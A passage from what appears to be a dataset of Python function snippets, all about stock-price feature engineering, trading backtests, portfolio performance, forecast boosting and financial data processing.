df['volume'].rolling(window=63).mean().shift(1)\n df_new['avg_volume_365'] = df['volume'].rolling(window=252).mean().shift(1)\n \n #average volume ratio\n df_new['ratio_avg_volume_5_30'] = df_new['avg_volume_5'] / df_new['avg_volume_30']\n df_new['ratio_avg_volumee_5_90'] = df_new['avg_volume_5'] / df_new['avg_volume_90'] \n df_new['ratio_avg_volume_5_365'] = df_new['avg_volume_5'] / df_new['avg_volume_365']\n df_new['ratio_avg_volume_30_90'] = df_new['avg_volume_30'] / df_new['avg_volume_90']\n df_new['ratio_avg_volume_30_365'] = df_new['avg_volume_30'] / df_new['avg_volume_365']\n df_new['ratio_avg_volume_90_365'] = df_new['avg_volume_90'] / df_new['avg_volume_365'] \n \n \n # standard deviation of prices\n df_new['std_price_5'] = df['close'].rolling(window=5).std().shift(1)\n df_new['std_price_30'] = df['close'].rolling(window=21).std().shift(1)\n df_new['std_price_90'] = df['close'].rolling(window=63).std().shift(1) \n df_new['std_price_365'] = df['close'].rolling(window=252).std().shift(1)\n \n # standard deviation ratio of prices \n df_new['ratio_std_price_5_30'] = 
df_new['std_price_5'] / df_new['std_price_30']\n df_new['ratio_std_price_5_90'] = df_new['std_price_5'] / df_new['std_price_90']\n df_new['ratio_std_price_5_365'] = df_new['std_price_5'] / df_new['std_price_365']\n df_new['ratio_std_price_30_90'] = df_new['std_price_30'] / df_new['std_price_90'] \n df_new['ratio_std_price_30_365'] = df_new['std_price_30'] / df_new['std_price_365'] \n df_new['ratio_std_price_90_365'] = df_new['std_price_90'] / df_new['std_price_365'] \n \n \n # standard deviation of volumes\n df_new['std_volume_5'] = df['volume'].rolling(window=5).std().shift(1)\n df_new['std_volume_30'] = df['volume'].rolling(window=21).std().shift(1)\n df_new['std_volume_90'] = df['volume'].rolling(window=63).std().shift(1)\n df_new['std_volume_365'] = df['volume'].rolling(window=252).std().shift(1)\n \n #standard deviation ratio of volumes\n df_new['ratio_std_volume_5_30'] = df_new['std_volume_5'] / df_new['std_volume_30']\n df_new['ratio_std_volume_5_90'] = df_new['std_volume_5'] / df_new['std_volume_90']\n df_new['ratio_std_volume_5_365'] = df_new['std_volume_5'] / df_new['std_volume_365'] \n df_new['ratio_std_volume_30_90'] = df_new['std_volume_30'] / df_new['std_volume_90']\n df_new['ratio_std_volume_30_365'] = df_new['std_volume_30'] / df_new['std_volume_365']\n df_new['ratio_std_volume_90_365'] = df_new['std_volume_90'] / df_new['std_volume_365'] \n \n # return\n df_new['return_1'] = ((df['close'] - df['close'].shift(1)) / df['close'].shift(1)).shift(1)\n df_new['return_5'] = ((df['close'] - df['close'].shift(5)) / df['close'].shift(5)).shift(1)\n df_new['return_30'] = ((df['close'] - df['close'].shift(21)) / df['close'].shift(21)).shift(1)\n df_new['return_90'] = ((df['close'] - df['close'].shift(63)) / df['close'].shift(63)).shift(1) \n df_new['return_365'] = ((df['close'] - df['close'].shift(252)) / df['close'].shift(252)).shift(1)\n \n #average of return\n df_new['moving_avg_5'] = df_new['return_1'].rolling(window=5).mean()\n df_new['moving_avg_30'] = df_new['return_1'].rolling(window=21).mean()\n df_new['moving_avg_90'] = df_new['return_1'].rolling(window=63).mean()\n df_new['moving_avg_365'] = df_new['return_1'].rolling(window=252).mean()\n \n # the target\n df_new['close'] = df['close']\n df_new = df_new.dropna(axis=0)\n return df_new", "def getIdealSec(context, data): #This replaced before_trading_start(context, data)\n record(Leverage = \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t context.account.leverage,pos=len(context.portfolio.positions))\n context.output = pipeline_output('my_pipeline')\n #print('Pipeout: ')\n #print(context.output)\n \n # These are the securities that we are interested in trading each day.\n # Note: As it stands, the securities in this list are from two different industries (defense and\n # consumer electronics). Although more computationally expensive then dividing them out into their \n # two respective industries prior to cross correlating, leaving them in the same matrix/data set and \n # cross correlating them gives us a way to 'check' that the crosscorrelation is valid, since securities within the same industry should typically cross correlate to a higher degree than across industries. 
***\n context.security_list = context.output.index \n context.defenseList = context.output[context.output['defenseFilt']].index.tolist()\n #print(context.defenseList)\n context.autoList = context.output[context.output['autoFilt']].index.tolist()\n #print(context.autoList)\n context.chemList = context.output[context.output['chemFilt']].index.tolist()\n #print(context.chemList)\n context.techList = context.output[context.output['techFilt']].index.tolist()\n #print(context.techList)\n context.depList = context.output[context.output['depFilt']].index.tolist()\n # Within each sector, calculate the mean (and max, since we may choose only to trade the maximally correlated securities regardless of industry) crosscorrelation between all combinations of stocks. \n #This will only run every trading day to prevent computational expense. In that \n #respect, performs identically to a pipeline add-on (but allows the use of \"history\") \n #Try block here incase pipe returns no valid securities. \n try:\n \tprice_history = np.transpose(data.history(context.security_list, fields=\"price\", bar_count=context.lookback,frequency=\"1m\"))\n \tprice_history=price_history.as_matrix()\n except:\n price_history=[[0],[0],[0]]\n #This returns three arrays, containing a filtered set of maximally cross correlated securities within the last time range (given by context.lookback), their associated (and filtered) time delays corresponding to their maximum correlation, and the degree of their correlation in the given time frame. Essentially, since tau has already been filtered for, the degree of their correlation should be used as a confidence feature to make predictions off of, and tau should be used to determine when to make purchases/sales. \n #hCorrVals,maxSecs,timeDelays,short_timeDelays=crossCorr(context.security_list,price_history,context)\n #The best securities to trade using this algorithm (each day) are listed in the below lists ***\n try:\n \thCorrVals,maxSecs,timeDelays,short_timeDelays=crossCorr(context.security_list,price_history,context) \n except: \n print('Crosscorr Failed')\n maxSecs,hCorrVals,timeDelays,short_timeDelays=[],[],[],[]\n #\"Globalize\" the returned information so that we can handle these commodities every minute. \n context.Securities=maxSecs\n context.CorrVals=hCorrVals\n context.timeDelays=short_timeDelays #************Used to be timeDelays, now however, we calculate a more recent tau\n context.actionList,context.timerList,context.tradeList,context.tradingNow=[0]*len(context.Securities),[0]*len(context.Securities),[0]*len(context.Securities),[0]*len(context.Securities) #list of zeros indicating that no stocks should currently be trading\n #(Note that all stocks should be sold at end of every tradinng day.) 
", "def calc_performance(self):\n for symbol in self.portfolio.assets.keys():\n\n # Total the Performance of all the trades\n start = self.portfolio.trades[symbol].index[0]\n end = self.portfolio.trades[symbol].index[-1]\n trades = len(self.record[symbol])\n profit = self.record[symbol]['profit'].sum()\n loss = self.record[symbol]['loss'].sum()\n # Total or average the trade info for all the trades\n try:\n wins = len(self.record[symbol].groupby('win/loose').groups['w'])\n except (ValueError, KeyError):\n wins = 0\n try:\n losses = len(self.record[symbol].groupby('win/loose').groups['l'])\n except (ValueError, KeyError):\n losses = 0\n try:\n washes = len(self.record[symbol].groupby('win/loose').groups['-'])\n except (ValueError, KeyError):\n washes = 0\n max_drawdown = self.record[symbol]['drawdown'].max()\n average_drawdown = self.record[symbol]['drawdown'].mean()\n max_drawdown_time = self.record[symbol]['drawdown days'].max()\n average_drawdown_time = self.record[symbol]['drawdown days'].mean()\n # Average the risk and market comparisons for all trades\n vol_risk = self.record[symbol]['volatility'].mean()\n beta = self.record[symbol]['beta'].mean()\n lpm_risk = self.record[symbol]['lpm'].mean()\n e_r = self.record[symbol]['expected_return'].mean()\n # Calculate Risk measures\n treynor_ratio = (e_r - self.risk_free_return) / beta\n sharpe_ratio = (e_r - self.risk_free_return) / vol_risk\n # Package up the data for each symbol\n self.performance[symbol] = {\n 'start': start,\n 'end': end,\n 'trades': trades,\n 'wins': wins,\n 'losses': losses,\n 'washes': washes,\n 'profit': profit,\n 'loss': loss,\n 'net_profit': profit - loss,\n 'profit_factor': profit / loss if loss != 0 else 1.0,\n 'percent_profitable': wins / trades if trades != 0 else 0.0,\n 'average_trade_net_profit' : (profit - loss) / trades if trades != 0 else 0.0,\n 'max_drawdown' : max_drawdown,\n 'average_drawdown' : average_drawdown,\n 'max_drawdown_days' : max_drawdown_time,\n 'average_drawdown_days' : average_drawdown_time,\n 'volatility_risk' : vol_risk,\n 'beta' : beta,\n 'lower_partial_moment_risk' : lpm_risk,\n 't_r' : treynor_ratio,\n 's_r' : sharpe_ratio\n }\n\n return self", "def FormatAndSplit(df, cut_date):\n \n idx = np.isnan(df['NotionalEUR'])\n df = df.ix[~idx, :]\n ticker_idx = {tck: i for i, tck in enumerate(set(df['Ticker']))}\n df['TradeDateKey'] = pd.to_datetime(df['TradeDateKey'], format='%Y%m%d')\n train = df.ix[df[u'TradeDateKey'] <= cut_date, :]\n test = df.ix[df[u'TradeDateKey'] > cut_date, :]\n \n ddata = df.ix[df[\"BuySell\"] == \"Buy\", [u'CustomerNameIdx', u'NotionalEUR', u'Ticker', u'TradeDateKey']]\n\n data_train = pd.DataFrame.copy(ddata)\n data_train.ix[data_train[u'TradeDateKey'] <= cut_date, \"NotionalEUR\"] = 0\n \n data_test = pd.DataFrame.copy(ddata)\n data_test.ix[data_test[u'TradeDateKey'] > cut_date, \"NotionalEUR\"] = 0\n \n # Bucket ratings into quantiles.\n cut_count = 10\n n_bins = 4\n labels = range(1, n_bins + 1)\n \n train_dense = data_train.groupby(['CustomerNameIdx', 'Ticker'])\n train_dense = (train_dense['NotionalEUR']\n .agg({'NotionalSum' : np.sum, 'count' : 'count'})\n .reset_index())\n train_dense = (train_dense\n .groupby('CustomerNameIdx')\n .filter(lambda x: sum(x['count']) >= cut_count))\n# train_dense[u'NotionalRating'], bins = pd.qcut(\n# train_dense[u'NotionalSum'], n_bins, labels=labels, retbins=True)\n train_dense[u'NotionalRating'] = train_dense[u'NotionalSum']\n \n test_dense = data_test.groupby(['CustomerNameIdx', 'Ticker'])\n test_dense = 
(test_dense['NotionalEUR']\n .agg({'NotionalSum' : np.sum, 'count' : 'count'})\n .reset_index())\n test_dense = (test_dense.groupby('CustomerNameIdx')\n .filter(lambda x: sum(x['count']) >= cut_count))\n# test_dense[u'NotionalRating'] = pd.cut(\n# test_dense[u'NotionalSum'], bins, labels=labels)\n test_dense[u'NotionalRating'] = test_dense[u'NotionalSum']\n \n train_dense['Ticker'] = train_dense['Ticker'].map(lambda x: ticker_idx[x])\n test_dense['Ticker'] = test_dense['Ticker'].map(lambda x: ticker_idx[x])\n \n train_dense.drop(['count', 'NotionalSum'], axis=1, inplace=True)\n test_dense.drop(['count', 'NotionalSum'], axis=1, inplace=True)\n \n # Remove empty rows\n idx = ~np.isnan(np.array(train_dense['NotionalRating']))\n train_dense = train_dense[idx]\n idx = ~np.isnan(np.array(test_dense['NotionalRating']))\n test_dense = test_dense[idx]\n \n nb_CustomerNameIdxs = len(set(df['CustomerNameIdx']))\n nb_tickers = len(set(df['Ticker']))\n \n return (train, \n ToSparse(train_dense, nrow=nb_CustomerNameIdxs, ncol=nb_tickers),\n test, \n ToSparse(test_dense, nrow=nb_CustomerNameIdxs, ncol=nb_tickers), \n ticker_idx)", "def price_to_seven_year_earnings_ratio_less_than_25(self):\n\n note = ''\n # check if 'EPS' exists\n if 'EPS' not in self.stock.main_df.columns:\n note = note + 'Could not find EPS on MacroTrends. '\n\n # check if Current price is not 0\n if self.stock.stats_dict['Current Price'] == 0:\n note = note + 'Could not find current price on MacroTrends. '\n\n if note != '':\n self.stock.append_calc_result('7 year P/E ratio < 25 ?', 'N/A', 'N/A', note)\n return\n\n curr_price = self.stock.stats_dict['Current Price']\n df = self.stock.main_df\n\n average = 0\n # i want to use previous year if current year is empty\n if not np.isnan(df.iloc[0]['EPS']):\n # present year is there\n past_7_years_df = df.iloc[0: 7]['EPS']\n average = past_7_years_df.mean()\n elif np.isnan(df.iloc[0]['EPS']):\n # present year is not there\n past_7_years_df = df.iloc[1: 8]['EPS']\n average = past_7_years_df.mean()\n if np.isnan(df.iloc[1]['EPS']):\n # past year is not there either\n past_7_years_df = df.iloc[2: 9]['EPS']\n average = past_7_years_df.mean()\n if np.isnan(df.iloc[2]['EPS']):\n self.stock.append_calc_result('7 year P/E ratio < 25 ?', 'N/A', 'N/A',\n 'Must not have filed their annual report for {}'.format(\n self.current_year - 2))\n return\n\n if average == 0:\n self.stock.append_calc_result('7 year P/E ratio < 25 ?', 'N/A', 'N/A',\n 'No average found')\n return\n elif (curr_price / average) <= 25:\n criteria_passed = 'Yes'\n else:\n criteria_passed = 'No'\n\n self.stock.append_calc_result('7 year P/E ratio < 25 ?', round((curr_price / average), 2),\n criteria_passed, '7 Year Average EPS = {}'.format(round(average, 2)))", "def scoreCompanies(self, companies):\n company_list = self.company\n tier = []\n business_type = ['inc', 'solutions', 'pvt.', 'pvt', 'private', 'ltd', 'limited', 'business']\n\n companies = [' '.join(w for w in company.split() if w.lower() not in business_type)\n for company in companies]\n\n for company in companies:\n match_score = []\n for company_name in company_list['company_name']:\n try:\n match_score.append(fuzz.partial_ratio(str(company_name), str(company)))\n except KeyError, e:\n match_score.append(0)\n\n try:\n if max(match_score) > 70:\n tier.append(company_list['tier'][match_score.index(max(match_score))])\n else:\n tier.append(1)\n except KeyError as e:\n tier.append(1)\n\n try:\n avg_score = (sum(tier)/len(tier))/4\n except:\n avg_score = 0\n\n return 
avg_score", "def portfolio_performance(returns,weights):\r\n print('Calculating Portfolio Performance')\r\n # returns=target_asset_port_data_attributes['component_returns']\r\n # weights =target_asset_port_data_attributes['effective_weights']\r\n\r\n component_returns= returns\r\n compnent_weights = pd.DataFrame(data=np.nan,index= component_returns.index,columns=component_returns.columns)\r\n compnent_weights.loc[weights.index,:] = weights\r\n\r\n portfolio_dates = component_returns.index\r\n components = component_returns.columns\r\n\r\n # pre-allocate\r\n BoP_df = pd.DataFrame(data=np.nan,index=portfolio_dates,columns=components)\r\n EoP_df = pd.DataFrame(data=np.nan,index=portfolio_dates,columns=components)\r\n PnL_df = pd.DataFrame(data=np.nan,index=portfolio_dates,columns=components)\r\n portfolio_BoP = pd.DataFrame(data=np.nan,index=portfolio_dates,columns=['Portfolio BoP'])\r\n portfolio_EoP = pd.DataFrame(data=np.nan,index=portfolio_dates,columns=['Portfolio EoP'])\r\n portfolio_PnL = pd.DataFrame(data=np.nan,index=portfolio_dates,columns=['Portfolio PnL'])\r\n \r\n portfolio_index = pd.DataFrame(data=np.nan,index=portfolio_dates,columns=['Index'])\r\n previous_index_value = np.int64(1)\r\n\r\n pre_date = portfolio_dates[0]\r\n # set BoP to start weights\r\n for date,row in component_returns.iterrows():\r\n # print(date)\r\n # 1st date\r\n if date == portfolio_dates[0]:\r\n BoP_df.loc[date] = compnent_weights.iloc[0,:]\r\n EoP_df.loc[date] = BoP_df.loc[date] * (1+component_returns.loc[date])\r\n PnL_df.loc[date] = EoP_df.loc[date].subtract(BoP_df.loc[date])\r\n\r\n portfolio_BoP.loc[date] = BoP_df.loc[date].sum()\r\n portfolio_EoP.loc[date] = EoP_df.loc[date].sum()\r\n portfolio_PnL.loc[date] = PnL_df.loc[date].sum()\r\n\r\n portfolio_index.loc[date] = np.nansum([previous_index_value,portfolio_PnL.loc[date].values])\r\n previous_index_value = portfolio_index.loc[date]\r\n pre_date = date\r\n\r\n # after first date\r\n else:\r\n BoP_df.loc[date] = EoP_df.loc[pre_date]\r\n # weights override\r\n if date in compnent_weights.index:\r\n none_NaN_index = ~compnent_weights.loc[date].isnull()\r\n if not compnent_weights.loc[date][none_NaN_index].empty:\r\n tmp_sum = BoP_df.loc[date].sum()\r\n BoP_df.loc[date][none_NaN_index.values] = (compnent_weights.loc[date][none_NaN_index.values].values)*tmp_sum\r\n\r\n \r\n EoP_df.loc[date] = BoP_df.loc[date] * (1+component_returns.loc[date])\r\n PnL_df.loc[date] = EoP_df.loc[date].subtract(BoP_df.loc[date])\r\n\r\n portfolio_BoP.loc[date] = BoP_df.loc[date].sum()\r\n portfolio_EoP.loc[date] = EoP_df.loc[date].sum()\r\n portfolio_PnL.loc[date] = PnL_df.loc[date].sum()\r\n \r\n portfolio_index.loc[date] = np.nansum([previous_index_value,portfolio_PnL.loc[date].values])\r\n previous_index_value = portfolio_index.loc[date]\r\n pre_date = date\r\n\r\n\r\n portfolio_returns = portfolio_index.pct_change(1) \r\n portfolio_returns.columns = ['Returns']\r\n\r\n portfolio_index\r\n perf = portfolio_index.calc_stats()\r\n \r\n output = pd.Series(data = [perf,PnL_df,portfolio_index,portfolio_BoP,portfolio_EoP,BoP_df], index=['Portfolio Perf','Component PnL','portfolio_index','portfolio_BoP','portfolio_EoP','BoP_df'])\r\n return output", "def get_discount(self, price):\r\n pass", "def price_generator(self, start, end, periods):\r\n tickers = [self.SelectedTicker]\r\n tick_yahoo = YahooFinancials(tickers)\r\n data = tick_yahoo.get_historical_price_data(start, \r\n end, \r\n periods)\r\n \r\n df = pd.DataFrame({\r\n a: {x['formatted_date']: x['adjclose'] for x in 
data[a]['prices']} for a in tickers})\r\n \r\n self.prices = df.dropna()\r\n self.returns = self.prices.pct_change().dropna()\r\n try:\r\n self.div_yield = tick_yahoo.get_dividend_yield()\r\n #print(self.div_yield[self.SelectedTicker])\r\n if self.div_yield[self.SelectedTicker] == None:\r\n self.div_yield = 0.00\r\n else:\r\n self.div_yield = self.div_yield[self.SelectedTicker]\r\n except:\r\n print(\"no dividend yield\")", "def Componentwise_Boosting(df_train, df_test, nu):\n\n # number of individual forecasts and number of periods\n K = df_test.shape[1]\n T = df_train.shape[0]\n T_test = df_test.shape[0]\n\n # variable of interest\n y = df_train.iloc[:, 0].values[:, np.newaxis]\n y_bar = np.mean(y)\n\n # individual forecasts\n F = np.swapaxes(df_train.iloc[:, 1:].values, 0, 1)[:, :, np.newaxis]\n F_t = np.swapaxes(F, 1, 2)\n F_test = np.swapaxes(df_test.values, 0, 1)[:, :, np.newaxis]\n\n # 5-fold CV to determine optimal M\n # length of training and testing sets\n T_cv_test = int(T/5)\n T_cv_train = T - T_cv_test\n\n # initialize vector to store the precision of fit\n SSR_vec = np.full(1000, 0, dtype=float)\n\n # find the optimal number of boosting iterationts using 5-fold CV\n # CV folds\n for k in range(5):\n\n # definition of the test and training sample for the given CV round\n cv_index = np.full(T, True, dtype=bool)\n cv_index[(k*T_cv_test):((k+1)*T_cv_test)] = False\n\n y_cv = y[cv_index]\n y_cv_bar = np.mean(y_cv)\n y_cv_test = y[~cv_index]\n\n F_cv = F[:, cv_index, :]\n F_cv_t = F_t[:, :, cv_index]\n F_cv_test = F[:, ~cv_index, :]\n\n # initialization step\n psi = np.tile(y_cv_bar, (T_cv_train, 1))\n psi_test = np.tile(y_cv_bar, (T_cv_test, 1))\n\n # main steps\n for m in range(1000):\n\n # compute the negative gradient vector\n u = y_cv - psi\n\n # regress the negative gradient vector on the ind. 
forecasts\n beta_hat = np.matmul(\n 1/np.matmul(F_cv_t, F_cv),\n np.matmul(F_cv_t, np.tile(u, (K, 1, 1)))\n )\n\n # save the sums of the squared residuals\n SSR = np.dot(np.ones(T_cv_train), (u - (beta_hat * F_cv))**2)\n\n # find the minimum SSR and its corresponding ind.forecast\n k_star = np.argmin(SSR)\n\n # update\n psi += nu * beta_hat[k_star, :, :] * F_cv[k_star, :, :]\n psi_test += nu * beta_hat[k_star, :, :] * F_cv_test[\n k_star, :, :]\n\n # save the precision of the fit\n SSR_vec[m] += np.sum((y_cv_test - psi_test)**2)\n\n # find number of iterations for which the MSE is the lowest\n M = np.argmin(SSR_vec) + 1\n\n # final Gradient Boosting with pre-determined number of iterations M\n # initialization step\n psi = np.tile(y_bar, (T, 1))\n psi_test = np.tile(y_bar, (T_test, 1))\n\n # main steps\n for m in range(M):\n\n # compute the negative gradient vector\n u = y - psi\n\n # regress the negative gradient vector on the individual forecasts\n beta_hat = np.matmul(\n 1/np.matmul(F_t, F),\n np.matmul(F_t, np.tile(u, (K, 1, 1)))\n )\n\n # save the sums of the squared residuals\n SSR = np.dot(np.ones(T), (u - (beta_hat * F))**2)\n\n # find the minimum SSR and its corresponding individual forecast\n k_star = np.argmin(SSR)\n\n # update\n psi += nu * beta_hat[k_star, :, :] * F[k_star, :, :]\n psi_test += nu * beta_hat[k_star, :, :] * F_test[k_star, :, :]\n\n # predictions\n df_pred = pd.DataFrame(\n {\"Componentwise Boosting\": psi_test.flatten()},\n index=df_test.index\n )\n\n return df_pred", "def performance_vs_index(self, index='SPY', dateIni='Ini', dateFin='Fin'):\n if dateFin == 'Fin':\n dateFin = self.data.index[-1]\n if dateIni == 'Ini':\n dateIni = self.data.index[0]\n portfolioGains = round(self.data.loc[self.data.index[-1], 'Profit/Loss%'], 2)\n else:\n pData = self.data.loc[dateIni:dateFin]\n pData.loc[:,'Profit/Loss'] = pData['Gains'].cumsum()\n pData.loc[:,'Profit/Loss%'] = pData['Profit/Loss'] / pData['Invested'] * 100\n portfolioGains = round(pData.loc[pData.index[-1], 'Profit/Loss%'], 2)\n indexData = yf.Ticker(index).history(start=dateIni, end=dateFin)\n indexData['Var%'] = (indexData.Close - indexData.Close[0]) / indexData.Close[0] * 100\n indexGains = round(indexData.loc[indexData.index[-1], 'Var%'], 2)\n return portfolioGains, indexGains, portfolioGains - indexGains", "def replacement_costs(self, proforma, technologies):\n replacement_df = pd.DataFrame()\n for der_inst in technologies:\n temp = der_inst.replacement_report(self.end_year, self.apply_rate)\n if temp is not None and not temp.empty:\n replacement_df = pd.concat([replacement_df, temp], axis=1)\n proforma = proforma.join(replacement_df)\n proforma = proforma.fillna(value=0)\n return proforma", "def sub_tax_transfer_pricing_eur(manager, df_fields, seq_recs, seq_reservas):\n # df_hotel = manager.get_dataframe(tables[\"dwc_bok_t_canco_hotel\"])\n # df_circuit = manager.get_dataframe(tables[\"dwc_bok_t_canco_hotel_circuit\"])\n # df_other = manager.get_dataframe(tables[\"dwc_bok_t_canco_other\"])\n # df_transfer = manager.get_dataframe(tables[\"dwc_bok_t_canco_transfer\"])\n # df_endow = manager.get_dataframe(tables[\"dwc_bok_t_canco_endowments\"])\n # df_extra = manager.get_dataframe(tables[\"dwc_bok_t_canco_extra\"])\n\n df_aux = df_fields.select(\"operative_incoming\", \"booking_id\", \"invoicing_company\", \"creation_date\",\n \"booking_currency\")\n\n df_hotel = sub_tax_transfer_pricing_eur_aux(manager, df_hotelt, seq_recs, seq_reservas, df_aux)\n df_circuit = sub_tax_transfer_pricing_eur_aux(manager, 
df_circuitt, seq_recs, seq_reservas, df_aux)\n df_other = sub_tax_transfer_pricing_eur_aux(manager, df_othert, seq_recs, seq_reservas, df_aux)\n df_transfer = sub_tax_transfer_pricing_eur_aux(manager, df_transfert, seq_recs, seq_reservas, df_aux)\n df_endow = sub_tax_transfer_pricing_eur_aux(manager, df_endowt, seq_recs, seq_reservas, df_aux)\n df_extra = sub_tax_transfer_pricing_eur_aux_extra(manager, df_extrat, seq_recs, seq_reservas, df_aux)\n\n df_impuesto_canco = df_hotel.union(df_circuit).union(df_other).union(df_transfer).union(df_endow).union(\n df_extra)\n\n df_impuesto_canco = df_impuesto_canco.groupBy(\"operative_incoming\", \"booking_id\") \\\n .agg({'impuesto_canco': 'sum'}).withColumnRenamed(\"SUM(impuesto_canco)\", \"impuesto_canco\")\n\n df_impuesto_canco = df_impuesto_canco.withColumnRenamed(\"operative_incoming\", \"seq_rec\") \\\n .withColumnRenamed(\"booking_id\", \"seq_res\")\n\n df_fields = df_fields.join(df_impuesto_canco, [df_fields.operative_incoming == df_impuesto_canco.seq_rec,\n df_fields.booking_id == df_impuesto_canco.seq_res],\n 'left_outer').drop(\"seq_rec\", \"seq_res\")\n\n df_addcanco = sub_transfer_pricing_aux_add_canco(manager, df_fields, seq_recs, seq_reservas, EUR)\n\n df_addcanco = df_addcanco.withColumnRenamed(\"operative_incoming\", \"seq_rec\") \\\n .withColumnRenamed(\"booking_id\", \"seq_res\")\n\n # add add_impuesto_canco\n df_fields = df_fields.join(df_addcanco, [df_fields.operative_incoming == df_addcanco.seq_rec,\n df_fields.booking_id == df_addcanco.seq_res],\n \"left_outer\").drop(df_addcanco.seq_rec).drop(df_addcanco.seq_res)\n\n df_fields = df_fields.na.fill({'impuesto_canco': 0, 'add_impuesto_canco': 0})\n\n df_fields = df_fields.withColumn(\"Tax_Transfer_pricing_EUR\",\n df_fields.impuesto_canco + df_fields.add_impuesto_canco) \\\n .drop(\"impuesto_canco\", \"add_impuesto_canco\")\n\n del df_hotel, df_circuit, df_other, df_transfer, df_endow, df_extra, df_impuesto_canco, df_addcanco\n\n return df_fields", "def pricing_line(self):\n self.data['pricing_line'] = (((self.data['Close'].shift(1)) < (self.data['Open'].shift(1))) & \\\n (((self.data['Open'].shift(1) + self.data['Close'].shift(1)) / 2) < (self.data['Close'])) & \\\n ((self.data['Open'] < self.data['Close']) & (self.data['Open'] < self.data['Close'].shift(1))) & \\\n (self.data['Close'] < self.data['Open'].shift(1)) & \\\n ((self.data['Close'] - self.data['Open']) / (0.001 + (self.data['High'] - self.data['Low'])) > 0.6))", "def create_feats_and_preds(price_df, feat_days, pred_days):\n\n # create shifted percent features\n df_feats = price_n_days_out(price_df, days=feat_days)\n df_help = df_feats.copy()[['ticker', 'prediction_date', f'price_{feat_days}_out']]\n df_help.columns = ['ticker', 'date', 'close']\n df_preds = price_n_days_out(df_help, days=pred_days)\n\n # do some cleaning\n full_df = pd.merge(df_feats, df_preds, left_on=['ticker', 'prediction_date'], right_on=['ticker', 'date'])\n full_df.columns = ['ticker', 'past_date', 'past_close', 'current_date', 'current_price',\n 'percent_change_feat', 'date_y', 'close_y', 'prediction_date',\n 'price_5_out_y', 'percent_change_pred']\n full_df = full_df[['ticker', 'past_date', 'current_date', 'prediction_date',\n 'percent_change_feat', 'percent_change_pred']]\n return full_df", "def market_value(dh: DataHandler):\n scenario_order = [\n str(dh.scenarios.active_scenarios[keys][\"name\"])\n for keys in dh.scenarios.active_scenarios\n ]\n\n # adding all vintage classes together\n df_supply = dh.get(\"o_supply\").groupby([\"r\", 
\"tec_supply\", \"t\"]).sum()\n df_supply = df_supply.stack().unstack(\"t\").T\n df_price = dh.get(\"o_prices\").stack().unstack(\"t\").T\n #print(df_supply.mul(df_price, fill_value = 0))\n\n # calculate market value\n df_mv = (\n df_supply.mul(df_price)\n .sum()\n .div(df_supply.sum())\n .unstack(\"scenario\")\n )\n df_mv = df_mv[scenario_order]\n\n df_PtHydrogen = pd.concat(\n [dh.get(\"o_h2price_sell\")], keys=[\"PtHydrogen\"], names=[\"tec_supply\"]\n )\n df_PtHydrogen = df_PtHydrogen.reorder_levels([\"r\", \"tec_supply\"])\n df_mv = pd.concat([df_mv, df_PtHydrogen])\n df_mv.fillna(0,inplace=True)\n\n return df_mv", "def calculate_indicators(ohlcv):\n\tprint(\"\\tCalculating technical indicators\")\n\n\tohlcv = ohlcv.drop([\"Volume (BTC)\", \"Weighted Price\"], axis=1)\n\tohlcv.columns = [\"Date\", \"Open\", \"High\", \"Low\", \"Close\", \"Volume\"]\n\n\ttemp_ohlcv = ohlcv.copy()\n\n\t# Converts ISO 8601 timestamps to UNIX\n\tunix_times = [int((dp.parse(temp_ohlcv.iloc[index][\"Date\"])).strftime(\"%s\")) for index in range(temp_ohlcv.shape[0])]\n\ttemp_ohlcv[\"Date\"] = (pd.Series(unix_times)).values\n\n\t# Converts column headers to lowercase and sorts rows in chronological order\n\ttemp_ohlcv.columns = [\"date\", \"open\", \"high\", \"low\", \"close\", \"volume\"]\n\ttemp_ohlcv = temp_ohlcv.iloc[::-1]\n\n\t# Rate of Change Ratio\n\trocr3 = ((Indicator(temp_ohlcv, \"ROCR\", 3)).getHistorical())[::-1]\n\trocr6 = ((Indicator(temp_ohlcv, \"ROCR\", 6)).getHistorical())[::-1]\n\n\t# Average True Range\n\tatr = ((Indicator(temp_ohlcv, \"ATR\", 14)).getHistorical())[::-1]\n\n\t# On-Balance Volume\n\tobv = ((Indicator(temp_ohlcv, \"OBV\")).getHistorical())[::-1]\n\n\t# Triple Exponential Moving Average\n\ttrix = ((Indicator(temp_ohlcv, \"TRIX\", 20)).getHistorical())[::-1]\n\n\t# Momentum\n\tmom1 = ((Indicator(temp_ohlcv, \"MOM\", 1)).getHistorical())[::-1]\n\tmom3 = ((Indicator(temp_ohlcv, \"MOM\", 3)).getHistorical())[::-1]\n\n\t# Average Directional Index\n\tadx14 = ((Indicator(temp_ohlcv, \"ADX\", 14)).getHistorical())[::-1]\n\tadx20 = ((Indicator(temp_ohlcv, \"ADX\", 20)).getHistorical())[::-1]\n\n\t# Williams %R\n\twillr = ((Indicator(temp_ohlcv, \"WILLR\", 14)).getHistorical())[::-1]\n\n\t# Relative Strength Index\n\trsi6 = ((Indicator(temp_ohlcv, \"RSI\", 6)).getHistorical())[::-1]\n\trsi12 = ((Indicator(temp_ohlcv, \"RSI\", 12)).getHistorical())[::-1]\n\n\t# Moving Average Convergence Divergence\n\tmacd, macd_signal, macd_hist = (Indicator(temp_ohlcv, \"MACD\", 12, 26, 9)).getHistorical()\n\tmacd, macd_signal, macd_hist = macd[::-1], macd_signal[::-1], macd_hist[::-1]\n\n\t# Exponential Moving Average\n\tema6 = ((Indicator(temp_ohlcv, \"MA\", 6, 1)).getHistorical())[::-1]\n\tema12 = ((Indicator(temp_ohlcv, \"MA\", 12, 1)).getHistorical())[::-1]\n\n\t# Append indicators to the input datasets\n\tmin_length = min(len(mom1), len(mom3), len(adx14), len(adx20), len(willr), len(rsi6), len(rsi12), len(macd), len(macd_signal), len(macd_hist), len(ema6), len(ema12), len(rocr3), len(rocr6), len(atr), len(obv), len(trix))\n\tohlcv = ohlcv[:min_length].drop([\"Open\", \"High\", \"Low\"], axis=1)\n\n\tohlcv[\"MOM (1)\"], ohlcv[\"MOM (3)\"], ohlcv[\"ADX (14)\"] = (pd.Series(mom1[:min_length])).values, (pd.Series(mom3[:min_length])).values, (pd.Series(adx14[:min_length])).values\n\tohlcv[\"ADX (20)\"], ohlcv[\"WILLR\"], ohlcv[\"RSI (6)\"] = (pd.Series(adx20[:min_length])).values, (pd.Series(willr[:min_length])).values, (pd.Series(rsi6[:min_length])).values\n\tohlcv[\"RSI (12)\"], ohlcv[\"MACD\"], 
